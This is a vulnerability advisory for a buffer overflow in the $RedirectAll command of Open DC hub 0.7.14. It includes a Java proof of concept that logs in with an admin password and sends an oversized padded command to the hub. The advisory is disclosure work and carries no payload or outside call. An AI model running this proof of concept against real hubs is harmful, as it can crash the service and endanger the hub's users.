Open DC hub Buffer Overflow ($RedirectAll)Summary
"Open DC hub is a Unix/Linux version of the hub software for the Direct Connect network. Direct Connect is a file sharing network made up by hubs, to which clients can connect."
An attacker with administrator rights on the hub can exploit a vulnerability in the $RedirectAll command to cause the clients connected to the network to run arbitrary code on the victim machine.
Credit:
The information has been provided by Donato Ferrante.
Details
Vulnerable Systems:
* Open DC hub version 0.7.14
NOTE: To exploit the bug the attacker needs to have administrator privileges on the victim hub.
Proof of Concept:
/*
Open Dc Hub (0.7.14) - Buffer Overflow - Proof Of Concept
Coded by: Donato Ferrante
*/
import java.net.Socket;
import java.net.UnknownHostException;
import java.net.SocketTimeoutException;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintStream;
public class OpenDcHub0714_BOF_poc {
private static int PORT = 53696;
private static int MAXSZ = 512;
private static String VERSION = "0.1";
public static void main(String [] args){
System.out.println(
"\n\n" +
"Open Dc Hub - Buffer Overflow - Proof Of Concept\n" +
"Version: " + VERSION + "\n" +
"coded by: Donato Ferrante\n" +
"e-mail: fdonato@autistici.org\n" +
"web: www.autistici.org/fdonato\n\n"
);
if(args.length <= 1){
System.out.println(
"Usage: java OpenDcHub0714_BOF_poc <host> <port> <admin_password>\n" +
"Note: default port is 53696.\n"
);
System.exit(-1);
}
String host = args[0];
String admin_password = args[args.length - 1];
int port = PORT;
try{
if(args.length > 2)
port = Integer.parseInt(args[1]);
}catch(Exception e){ port = PORT; }
try{
Socket socket = new Socket(host, port);
socket.setSoTimeout(10000);
BufferedReader in_stream = new BufferedReader(new InputStreamReader(socket.getInputStream()));
PrintStream out_stream = new PrintStream(socket.getOutputStream());
System.out.println(in_stream.readLine());
System.out.println(in_stream.readLine());
System.out.println(in_stream.readLine());
System.out.println(in_stream.readLine());
System.out.println("Logging...");
out_stream.println("$adminpass " + admin_password +"|\n");
in_stream.readLine();
String err = in_stream.readLine();
if(err.toLowerCase().indexOf("bad") >= 0){
System.out.println("Login failed...");
System.out.println("Exiting...");
System.exit(-1);
}
else
System.out.println("Logged in...");
System.out.println("Building test string to inject...");
String buff = build();
Thread.sleep(1500);
System.out.println("Injecting test string...");
out_stream.println(buff);
Thread.sleep(1500);
System.out.println("Proof_Of_Concept terminated.");
}catch(SocketTimeoutException ste){System.out.println("Socket timeout."); System.exit(-1);}
catch(UnknownHostException uhe){ System.out.println("Host: " + host + " unknown.."); System.exit(-1); }
catch(InterruptedException ie){ System.out.println("Thread warning...");}
catch(Exception ioe){ System.out.println("Unable to create the socket!"); System.exit(-1);}
}
private static String build(){
String over = "";
for(int i = 0; i < MAXSZ; i++)
over += 0x61;
String ret = "$RedirectAll " + over + "|\n";
return ret;
}
}
推荐
评论(0条)
